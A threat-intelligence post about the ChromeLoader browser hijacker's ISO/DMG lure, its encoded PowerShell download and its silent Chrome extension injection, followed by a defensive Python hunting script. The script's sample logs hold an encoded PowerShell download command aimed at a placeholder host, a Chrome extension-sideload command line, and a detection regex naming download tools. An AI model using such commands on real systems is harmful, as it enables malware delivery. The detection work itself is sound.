An uptick has been observed in detections of ChromeLoader malware this month, following a steady volume of attacks since the beginning of the year.

ChromeLoader

ChromeLoader is a browser hijacker that makes changes to victims' web browser settings to show search results promoting fake giveaways, unwanted software, surveys, adult games, and dating sites.
  • The malware operators profit through a marketing affiliate system that redirects users' traffic to advertising sites.
  • Additionally, Twitter posts were spotted advertising cracked Android games and offering QR codes leading to malware-hosting sites.
  • ChromeLoader is notable for its volume, its infection route, and its persistence.

Use of PowerShell

ChromeLoader uses a malicious ISO archive file to compromise its victims.
  • The ISO masquerades as a cracked .exe for a game or software to fool victims into downloading the file by themselves from torrent or malicious sites.
  • If a user double-clicks the ISO file on Windows 10 or later, it is mounted as a virtual CD-ROM drive. The image contains an executable, named CS_Installer[.]exe, that poses as a game crack or keygen.
  • ChromeLoader then executes and decodes a PowerShell command to fetch an archive from a remote resource; the archive is loaded as a Google Chrome extension.
  • Finally, a PowerShell script removes the scheduled task, leaving Chrome infected with a silently injected extension that hijacks the browser and tampers with search engine results.

Targets macOS as well

ChromeLoader targets macOS systems as well, manipulating both Chrome and Apple's Safari. On macOS, the infection chain uses DMG (Apple Disk Image) files instead of ISO files.
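The infection chain summarised in the two sections above (an executable run from a mounted ISO, a decoded PowerShell command that downloads an archive, an extension injected into Chrome, and the clean-up of a scheduled task) maps onto a handful of process-creation signals a defender can hunt for. The script below is an added example and is not code from the original post or from Cyware: it runs simple rules over constructed, simplified process-creation records (timestamp, image path, command line, parent image; the field layout is my assumption, modelled loosely on a Sysmon process-creation export) and decodes any `-EncodedCommand` payload it finds. It generalises slightly beyond the text by also treating a binary launched from a mounted DMG under `/Volumes/` on macOS as the same "launched from a mounted disk image" signal. The `--load-extension` switch is a real Chrome command-line switch; that ChromeLoader uses it to sideload its extension is an assumption on my part, since the summary only says the extension is injected silently.

```python
"""Hunt for the ChromeLoader-style infection chain in process-creation telemetry.

Added example, not part of the original post. Record layout (assumed):
    timestamp|image_path|command_line|parent_image
"""
import base64
import re


def _encode_ps(script: str) -> str:
    """Encode a PowerShell script the way -EncodedCommand expects (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry). The encoded PowerShell is a
# harmless download one-liner pointing at a reserved .invalid domain.
SAMPLE_LOGS = [
    "2023-05-01T10:00:01Z|E:\\CS_Installer.exe|\"E:\\CS_Installer.exe\"|C:\\Windows\\explorer.exe",
    "2023-05-01T10:00:03Z|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -w hidden -enc "
    + _encode_ps("Invoke-WebRequest http://example.invalid/ext.zip -OutFile $env:TEMP\\ext.zip")
    + "|E:\\CS_Installer.exe",
    "2023-05-01T10:00:09Z|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|"
    "chrome.exe --load-extension=C:\\Users\\u\\AppData\\Local\\Temp\\ext|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "2023-05-01T10:00:10Z|C:\\Windows\\System32\\schtasks.exe|schtasks /delete /tn ChromeTask /f|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "2023-05-01T11:00:00Z|C:\\Windows\\System32\\notepad.exe|notepad.exe|C:\\Windows\\explorer.exe",
    # macOS analogue: a binary launched from a mounted DMG (constructed).
    "2023-05-01T12:00:00Z|/Volumes/Game Crack/Install|/Volumes/Game Crack/Install|"
    "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder",
]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_CMD_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Executable at the root of a non-system drive letter (a mounted ISO shows up
# as a new drive) or anything under a mounted DMG on macOS. Heuristic: a
# legitimate second fixed drive will also match, so this is a triage signal.
MOUNTED_IMAGE_RE = re.compile(r"^(?:[D-Z]:\\[^\\]+\.exe|/Volumes/[^/]+/.+)$", re.I)
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\bcurl\b|\bwget\b", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENCODED_CMD_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record: str) -> dict:
    """Apply the chain's per-stage rules to one record and return its findings."""
    ts, image, cmdline, parent = record.split("|", 3)
    findings = []
    if MOUNTED_IMAGE_RE.match(image):
        findings.append("process launched from a mounted disk image")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        if DOWNLOAD_RE.search(decoded):
            findings.append("decoded command fetches a remote resource")
    if image.lower().endswith("chrome.exe") and "--load-extension" in cmdline.lower():
        findings.append("chrome started with a sideloaded extension")
    if image.lower().endswith("schtasks.exe") and re.search(r"/delete", cmdline, re.I):
        findings.append("scheduled task deleted")
    return {"ts": ts, "image": image, "parent": parent, "findings": findings, "decoded": decoded}


def hunt(records):
    """Return only the records that triggered at least one rule."""
    return [r for r in (analyze(rec) for rec in records) if r["findings"]]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(hit["ts"], hit["image"], "->", "; ".join(hit["findings"]))
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
```

Each rule on its own is noisy (plenty of legitimate software runs encoded PowerShell, and a second fixed drive also matches the drive-letter heuristic); the value is in the sequence, so in practice you would correlate these findings along the parent-process chain within a short window rather than alert on any single hit.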

Conclusion

The recent report can help in building defense in depth against ChromeLoader, and it shows how threats abuse suspicious ISO/DMG files and PowerShell execution. For protection, users can consult the Chrome and Safari guides on managing, restricting, or removing extensions.
Cyware Publisher